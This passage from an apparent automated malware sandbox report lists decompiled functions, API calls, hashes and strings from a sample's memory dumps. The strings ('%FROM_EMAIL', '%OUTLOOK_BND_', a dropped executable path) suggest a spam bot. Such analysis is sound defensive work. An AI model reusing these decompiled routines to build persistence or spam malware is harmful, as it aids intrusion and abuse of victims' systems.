						_v8 = _v8 + 1;
						if(_t50 > 0) {
							continue;
						}
						break;
					}
					_t57 = 0;
					goto L11;
				}
			}

APIs

RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 0040E127
RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,004122F8), ref: 0040E158
RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Value$CloseCreateDelete
String ID:
API String ID: 2667537340-0
Opcode ID: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
Opcode Fuzzy Hash: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0216E2E5, Relevance: 6.1, APIs: 4, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(80000001,0216E4F3,00000000,00000000,00000000,00020106,00000000,0216E4F3,00000000,000000E4), ref: 0216E302
RegSetValueExA.ADVAPI32(0216E4F3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 0216E377
RegDeleteValueA.ADVAPI32(0216E4F3,?,?,?,?,?,000000C8,004122F8), ref: 0216E3A8
RegCloseKey.ADVAPI32(0216E4F3,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,?,0216E4F3), ref: 0216E3B1

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Value$CloseCreateDelete
String ID:
API String ID: 2667537340-0
Opcode ID: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
Instruction ID: a85963da1f08108a8f0732a1aac87186cbd1dd48e506ca2f09bba28b3496bb3d
Opcode Fuzzy Hash: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
Instruction Fuzzy Hash: D4214C72A4021DABDF209FA5EC89EEF7FB9EF09750F048161F905A6150E3718A65CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00403F18, Relevance: 6.0, APIs: 4, Instructions: 46
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}

APIs

WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
GetLastError.KERNEL32 ref: 00403F4E
WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
String ID:
API String ID: 3373104450-0
Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6

Uniqueness

Uniqueness Score: -1.00%

Function 00403F8C, Relevance: 6.0, APIs: 4, Instructions: 46
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}

APIs

ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
GetLastError.KERNEL32 ref: 00403FC2
WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
String ID:
API String ID: 888215731-0
Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6

Uniqueness

Uniqueness Score: -1.00%

Function 02164168, Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02164194
GetLastError.KERNEL32 ref: 0216419E
WaitForSingleObject.KERNEL32(?,?), ref: 021641AF
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 021641C2

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
String ID:
API String ID: 3373104450-0
Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction ID: 1e334affe3bbb110b8e5f1020bc570158754aa8ac8c45305c7923b3c5f264725
Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction Fuzzy Hash: A001A572511109ABDF11EF90ED89BEF7BBCFB18256F114061F901E2050E774AA648BB6

Uniqueness

Uniqueness Score: -1.00%

Function 021641DC, Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02164208
GetLastError.KERNEL32 ref: 02164212
WaitForSingleObject.KERNEL32(?,?), ref: 02164223
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 02164236

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
String ID:
API String ID: 888215731-0
Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction ID: 787c01952bd062d06071603546659947ad6100ce342ebc49c90cb20e3395263c
Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction Fuzzy Hash: 1901C472512209ABDF11DF95ED88BEF7BBCFB08256F108065F901E2050D770DA648BB6

Uniqueness

Uniqueness Score: -1.00%

Function 0216E01F, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 35stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32(?,80000009), ref: 0216E04F

Strings

A, xrefs: 0216E01F
A, xrefs: 0216E020, 0216E025
A, xrefs: 0216E068

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: lstrcmp
String ID: A$ A$ A
API String ID: 1534048567-1846390581
Opcode ID: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
Instruction ID: 2b553191754819baba5d848c5448493b43076ca281e4d57b0781bf709243204f
Opcode Fuzzy Hash: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
Instruction Fuzzy Hash: A3F06275700712DBCB30CF15D888EA6B7E9FB09325B54876AE564C3060D374A5A4CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C7, Relevance: 6.0, APIs: 4, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A4C7(intOrPtr _a4) {
				long _t3;
				LONG* _t8;
				long _t9;

				_t9 = GetTickCount();
				_t8 = _a4 + 0x5c;
				while(1) {
					_t3 = InterlockedExchange(_t8, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t9;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}

0x0040a4dd
0x0040a4df
0x0040a4f7
0x0040a4fa
0x0040a4fe
0x00000000
0x00000000
0x0040a4e6
0x0040a4ed
0x0040a4f1
0x00000000
0x0040a4f1
0x00000000
0x0040a4ed
0x0040a504

APIs

GetTickCount.KERNEL32 ref: 0040A4D1
GetTickCount.KERNEL32 ref: 0040A4E4
Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF

Uniqueness

Uniqueness Score: -1.00%

Function 00404E92, Relevance: 6.0, APIs: 4, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E92(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 4;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x2710) {
						Sleep(0xa);
						continue;
					}
					break;
				}
				return _t2;
			}

0x00404e9c
0x00404ea6
0x00404ea8
0x00404ec0
0x00404ec3
0x00404ec7
0x00000000
0x00000000
0x00404eaf
0x00404eb6
0x00404eba
0x00000000
0x00404eba
0x00000000
0x00404eb6
0x00404ecd

APIs

GetTickCount.KERNEL32 ref: 00404E9E
GetTickCount.KERNEL32 ref: 00404EAD
Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD

Uniqueness

Uniqueness Score: -1.00%

Function 00404BD1, Relevance: 6.0, APIs: 4, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BD1(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 0xc;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t2;
			}

0x00404bdb
0x00404be5
0x00404be7
0x00404bff
0x00404c02
0x00404c06
0x00000000
0x00000000
0x00404bee
0x00404bf5
0x00404bf9
0x00000000
0x00404bf9
0x00000000
0x00404bf5
0x00404c0c

APIs

GetTickCount.KERNEL32 ref: 00404BDD
GetTickCount.KERNEL32 ref: 00404BEC
Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD

Uniqueness

Uniqueness Score: -1.00%

Function 004030FA, Relevance: 6.0, APIs: 4, Instructions: 23
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030FA(LONG* _a4) {
				long _t3;
				long _t5;

				_t5 = GetTickCount();
				while(1) {
					_t3 = InterlockedExchange(_a4, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t5;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}

0x0040310b
0x00403122
0x00403128
0x0040312c
0x00000000
0x00000000
0x00403111
0x00403118
0x0040311c
0x00000000
0x0040311c
0x00000000
0x00403118
0x00403131

APIs

GetTickCount.KERNEL32 ref: 00403103
GetTickCount.KERNEL32 ref: 0040310F
Sleep.KERNEL32(00000000), ref: 0040311C
InterlockedExchange.KERNEL32(?,00000001), ref: 00403128

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A

Uniqueness

Uniqueness Score: -1.00%

Function 02168319, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 021683AF
RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 02168460

Part of subcall function 021669AC: SetFileAttributesA.KERNEL32(?,00000080), ref: 021669CE
Part of subcall function 021669AC: SetFileAttributesA.KERNEL32(?,00000002), ref: 02166A0F
Part of subcall function 021669AC: GetFileSize.KERNEL32(000000FF,00000000), ref: 02166A23

Part of subcall function 0216EE7E: GetProcessHeap.KERNEL32(00000000,?,00000000,02161DB8,?), ref: 0216EE91
Part of subcall function 0216EE7E: HeapFree.KERNEL32(00000000), ref: 0216EE98

Strings

C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe, xrefs: 02168475, 0216848A

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: File$AttributesHeap$CloseFreeOpenProcessSize
String ID: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe
API String ID: 359188348-2108603222
Opcode ID: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
Instruction ID: 65124eef10e300036aaf89b6e4bf5344dc7318d32a1a4624b056e4d7583d375d
Opcode Fuzzy Hash: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
Instruction Fuzzy Hash: DB4181B2981108BFEB10EBA49D88EFF777DDB04304F15447AE905E6010E7749AA98B65

Uniqueness

Uniqueness Score: -1.00%

Function 0216AFD9, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0216AFE8
SystemTimeToFileTime.KERNEL32(?,?), ref: 0216AFF6

Part of subcall function 0216AF58: gethostname.WS2_32(?,00000080), ref: 0216AF6C
Part of subcall function 0216AF58: lstrcpy.KERNEL32(?,00410B90), ref: 0216AFCF

Part of subcall function 02163305: gethostname.WS2_32(?,00000080), ref: 02163328
Part of subcall function 02163305: gethostbyname.WS2_32(?), ref: 02163332

Part of subcall function 0216A9F3: inet_ntoa.WS2_32(00000000), ref: 0216A9F9

Strings

%OUTLOOK_BND_, xrefs: 0216B05F, 0216B064, 0216B0A7, 0216B0C6

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
String ID: %OUTLOOK_BND_
API String ID: 1981676241-3684217054
Opcode ID: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
Instruction ID: 061d1230e1f06e609de55910c12afdf899bca7347344a938a4d7de257213e79d
Opcode Fuzzy Hash: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
Instruction Fuzzy Hash: 13414DB294024CAFDB25AFA0DC49EEE3BADFB04304F244426B925E2151EB75DA54CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0216943B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119sleepCOMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 0216951F
Sleep.KERNEL32(000001F4), ref: 02169546

Strings

, xrefs: 021694C2

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: ExecuteShellSleep
String ID:
API String ID: 4194306370-3916222277
Opcode ID: 3fe3a9cff56685cfc2ef6a8587b4668aa021f53b51d96722d85aa4ab8f9335b7
Instruction ID: 50d5bff4627195a57c3e0064664f03f6d643d6c6a874928ea84d47f2d76aa142
Opcode Fuzzy Hash: 3fe3a9cff56685cfc2ef6a8587b4668aa021f53b51d96722d85aa4ab8f9335b7
Instruction Fuzzy Hash: C6419771C883846FFB368728D88C7FE3FE49B02314F1901E6D0968B492D7B448A1C750

Uniqueness

Uniqueness Score: -1.00%

Function 00406987, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00406987(void* __ecx, void* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
				long _v8;
				long _v12;
				signed int _t50;
				signed int _t53;
				int _t59;
				signed int _t60;
				long _t68;
				signed int _t74;
				void* _t78;
				void* _t85;

				_t78 = _a8;
				_t48 =  *((intOrPtr*)(_t78 + 0x3c)) + _t78;
				_t7 =  &_a16; // 0x406b2c
				_t85 = (( *( *((intOrPtr*)(_t78 + 0x3c)) + _t78 + 6) & 0x0000ffff) - 1) * 0x28 + ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
				_t68 =  *(_t85 + 0x14);
				_t50 =  *_t7 - _t68;
				_v8 = _t50;
				if(_t68 >= _a12) {
					L5:
					_a16 = _a16 & 0x00000000;
				} else {
					_t74 =  *(_t85 + 0x10);
					if(_t74 == 0) {
						goto L5;
					} else {
						_v12 = _t74;
						_a16 = _t50 / _t74;
						if(_a16 < 1) {
							_a16 = 1;
						}
						_t20 =  &_a16; // 0x406b2c
						 *(_t85 + 0x10) =  *_t20 * _t74;
					}
				}
				_v8 = _v8 & 0x00000000;
				if(WriteFile(_a4, _t78, _t68,  &_v8, 0) == 0 || _v8 != _t68) {
					if(_a16 != 0) {
						 *(_t85 + 0x10) = _v12;
					}
					_t53 = 0;
				} else {
					if(_a16 == 0) {
						L13:
						_t53 = _t68;
					} else {
						 *(_t85 + 0x10) = _v12;
						while(1) {
							_v8 = _v8 & 0x00000000;
							_t59 = WriteFile(_a4, _a8 +  *(_t85 + 0x14), _v12,  &_v8, 0);
							_t60 = _v8;
							if(_t59 == 0 || _t60 != _v12) {
								break;
							}
							_t68 = _t68 + _t60;
							_t41 =  &_a16;
							 *_t41 = _a16 - 1;
							if( *_t41 != 0) {
								continue;
							} else {
								goto L13;
							}
							goto L18;
						}
						asm("sbb eax, eax");
						_t53 =  !_t60 & _t68 + _t60;
					}
				}
				L18:
				return _t53;
			}

0x0040698f
0x00406995
0x004069a7
0x004069aa
0x004069ac
0x004069af
0x004069b1
0x004069b7
0x004069e0
0x004069e0
0x004069b9
0x004069b9
0x004069be
0x00000000
0x004069c0
0x004069c4
0x004069c7
0x004069d0
0x004069d2
0x004069d2
0x004069d5
0x004069db
0x004069db
0x004069be
0x004069e4
0x004069fd
0x00406a51
0x00406a56
0x00406a56
0x00406a59
0x00406a04
0x00406a08
0x00406a3c
0x00406a3c
0x00406a0a
0x00406a0d
0x00406a10
0x00406a10
0x00406a27
0x00406a2b
0x00406a2e
0x00000000
0x00000000
0x00406a35
0x00406a37
0x00406a37
0x00406a3a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a3a
0x00406a45
0x00406a49
0x00406a49
0x00406a08
0x00406a5b
0x00406a5f

APIs

WriteFile.KERNEL32(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
WriteFile.KERNEL32(00409A60,?,00409A60,00000000,00000000), ref: 00406A27

Strings

,k@, xrefs: 004069A7, 004069D5

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID: ,k@
API String ID: 3934441357-1053005162
Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0216BC63, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0216B9C2
InterlockedIncrement.KERNEL32(00413648), ref: 0216BA23
InterlockedIncrement.KERNEL32(?), ref: 0216BA7D
GetTickCount.KERNEL32 ref: 0216BB62
GetTickCount.KERNEL32 ref: 0216BB82
InterlockedIncrement.KERNEL32(?), ref: 0216BDFE
closesocket.WS2_32(00000000), ref: 0216BE9D

Strings

%FROM_EMAIL, xrefs: 0216BC66

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: CountIncrementInterlockedTick$closesocket
String ID: %FROM_EMAIL
API String ID: 1869671989-2903620461
Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
Instruction ID: 48d006f7b7077cb9ffac2dfb0a2f747b8eb62fb968864ed2ce2f2388bb665e2e
Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
Instruction Fuzzy Hash: C4318B32584248AFDF24DFA4DC88AFD77A9EB44708F20405AFA24E2160EB31D794CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00408CEE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408CEE() {
				intOrPtr* _v8;
				intOrPtr _v12;
				long _t15;
				char _t17;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t25;
				signed int _t31;
				signed char _t35;
				signed int _t36;
				char* _t41;
				intOrPtr* _t42;
				signed int _t45;
				void* _t49;

				_push(_t34);
				_t31 = 0;
				_t49 =  *0x413380 - _t31; // 0x0
				if(_t49 == 0) {
					L17:
					return _t15;
				}
				_t15 = GetTickCount() -  *0x413388;
				if(_t15 < 0xea60) {
					goto L17;
				}
				_t41 =  *0x413380; // 0x0
				_t17 =  *_t41;
				_t45 =  *(_t41 + 1);
				_t42 = _t41 + 5;
				_v12 = _t17;
				if(_t17 <= 0) {
					L16:
					_t15 = GetTickCount();
					 *0x413388 = _t15;
					goto L17;
				} else {
					_v8 = _t42;
					do {
						_t35 =  *_v8;
						if(_t35 != 8) {
							if(_t35 != 9) {
								_t36 = _t35;
								_t19 =  *((intOrPtr*)(0x413300 + _t36 * 4));
								if(_t19 == 0) {
									goto L12;
								}
								_t9 = _t19 + 0x34; // 0x3b10c483
								if(_t36 ==  *_t9) {
									_t13 = _t19 + 0x50; // 0x7486850
									_t20 =  *_t13;
									if(_t20 != 0) {
										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
									}
									goto L16;
								}
								goto L12;
							}
							_t25 = E0040A688(_t45 >> _t35 & 0x00000001);
							L8:
							if(_t25 != 0) {
								_t6 = _v8 + 1; // 0x3cc6
								_t45 = _t45 |  *_t6;
							}
							goto L12;
						}
						_t25 = E0040A677(_t45 >> _t35 & 0x00000001);
						goto L8;
						L12:
						_v8 = _v8 + 5;
						_t31 = _t31 + 1;
					} while (_t31 < _v12);
					goto L16;
				}
			}

0x00408cf2
0x00408cf4
0x00408cf6
0x00408cfc
0x00408dae
0x00408db0
0x00408db0
0x00408d08
0x00408d13
0x00000000
0x00000000
0x00408d1b
0x00408d21
0x00408d24
0x00408d27
0x00408d2a
0x00408d2f
0x00408da1
0x00408da1
0x00408da8
0x00000000
0x00408d31
0x00408d31
0x00408d34
0x00408d37
0x00408d3c
0x00408d50
0x00408d6c
0x00408d6f
0x00408d78
0x00000000
0x00000000
0x00408d7a
0x00408d7d
0x00408d8b
0x00408d8b
0x00408d90
0x00408d9e
0x00408da0
0x00000000
0x00408d90
0x00000000
0x00408d7d
0x00408d5a
0x00408d5f
0x00408d62
0x00408d67
0x00408d67
0x00408d67
0x00000000
0x00408d62
0x00408d46
0x00000000
0x00408d7f
0x00408d7f
0x00408d83
0x00408d84
0x00000000
0x00408d89

APIs

GetTickCount.KERNEL32 ref: 00408D02
GetTickCount.KERNEL32 ref: 00408DA1

Strings

localcfg, xrefs: 00408D19

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CountTick
String ID: localcfg
API String ID: 536389180-1857712256
Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BFCE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040BFD0
wsprintfA.USER32 ref: 0040C060

Strings

Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057

Memory Dump Source

